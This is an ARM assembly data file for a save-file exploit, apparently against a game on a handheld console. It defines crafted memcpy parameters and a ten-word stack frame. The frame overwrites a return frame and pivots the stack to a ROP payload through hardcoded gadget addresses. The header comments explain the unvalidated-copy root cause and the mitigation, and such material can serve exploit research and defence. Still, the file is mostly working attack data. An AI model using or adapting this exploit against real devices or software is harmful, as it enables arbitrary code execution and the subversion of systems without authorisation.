@---------------------------------------------------------------------------------
@ exploit.s - save-file exploit data blob (pure .word data, nothing here executes
@ in place).
@ Syntax:   GNU as, ARM mode (.arm); '@' starts a comment.
@ Preproc:  assumes the file is run through the C preprocessor
@           (assembler-with-cpp) - the #include/#define lines and the '//'
@           comment on the STACK_PIVOT define require it; plain 'as' would
@           reject them.
@ Layout:   per the comments below, the assembled bytes are written into
@           all.dat at +0x1010. The words from _start to frame_bottom are the
@           parameters the game's copy loop reads; frame_bottom..frame_top
@           (10 words, 40 bytes) is the frame that loop copies over the stack.
@           MEMCPY_SIZE is defined as (frame_top-frame_bottom), so those two
@           labels must bracket exactly the frame - inserting or removing a
@           word between them silently changes the copy size and MEMCPY_DEST.
@ Root cause (as described in the comments on the iteration count below): the
@           copy count, size and destination appear to be taken from save data
@           without validation, so the first copy can overwrite the second
@           copy's own parameters. The game-side mitigation is to bounds-check
@           those values against the destination buffer before copying, and
@           not to keep the copy parameters inside the buffer being copied.
@ Symbols:  ROP_POPPC and any other names not defined in this file are expected
@           to come from defines_pika.h - NOTE(review): confirm against that
@           header; it is not visible here.
@---------------------------------------------------------------------------------
.arm
.text @ .text is only a container for the blob; it is never mapped as code here
#include "defines_pika.h"
#define GARBAGE 0xdeadb0b0
#define MEMCPY_BLOCKS 1
#define MEMCPY_SIZE (frame_top-frame_bottom)
#define MEMCPY_ITERATIONS 2
#define MEMCPY_DEST (0x0fffff50 - MEMCPY_SIZE)
#define PAYLOAD_ADDR 0x003449c0
#define STACK_PIVOT 0x001C2C1C //stack pivot gadget (mov r1,r4; mov r0,r5; blx r8 --SP_LINK--> mov sp,r0; blx r1)
#define PIVOT_SP PAYLOAD_ADDR
#define PIVOT_PC ROP_POPPC
#define SP_LINK 0x0014ce58
.global _start
@---------------------------------------------------------------------------------
_start:
@ Copy everything here to all.dat + 0x1010
@ Save file exploit setup data - everything between _start and frame_bottom sets up the memcpy of the exploit frame (frame_bottom -- frame_top)
@ Word order in this header is fixed by the game's parser; do not reorder.
.word MEMCPY_BLOCKS @ all.dat has 5 identical sections of some unknown game data that the memcpy exploit works on, we choose only the 1st.
.word GARBAGE @ ??? (meaning unknown to the author; value is presumably ignored - unverified)
.word MEMCPY_SIZE @ Just enough to copy the below crafted frame to overwrite the current function's return frame
.word MEMCPY_ITERATIONS @ First iteration memcpy copies over the next iteration memcpy's dest and size data, this is the exploit
.word GARBAGE @ Next 5 words are game data we don't care about
.word GARBAGE @
.word GARBAGE @
.word GARBAGE @
.word GARBAGE @
frame_bottom: @ Exploit frame - everything beyond here will be copied to the stack. upon the current function's return, it will pivot the stack to our rop payload (payload.s, or otherapp loader)
@ The 10 words below mirror a pop {r4-r11,pc} style epilogue frame preceded by
@ MEMCPY_DEST; the register labels on each line give the mapping.
.word MEMCPY_DEST @ MEMCPY_DEST is not needed in the frame but its still copied to the stack with the other data - no choice here
.word PIVOT_PC @ r4 - NewStackPC
.word PIVOT_SP @ r5 - NewStackSP
.word GARBAGE @ r6
.word GARBAGE @ r7
.word SP_LINK @ r8 - Connecting jump between 2 pivot gadgets - post exploitation, it can be its own stack pivot
.word GARBAGE @ r9
.word GARBAGE @ r10
.word GARBAGE @ r11
.word STACK_PIVOT @ pc
frame_top: @ end of frame; MEMCPY_SIZE = frame_top - frame_bottom (keep this label directly after the last .word)
@---------------------------------------------------------------------------------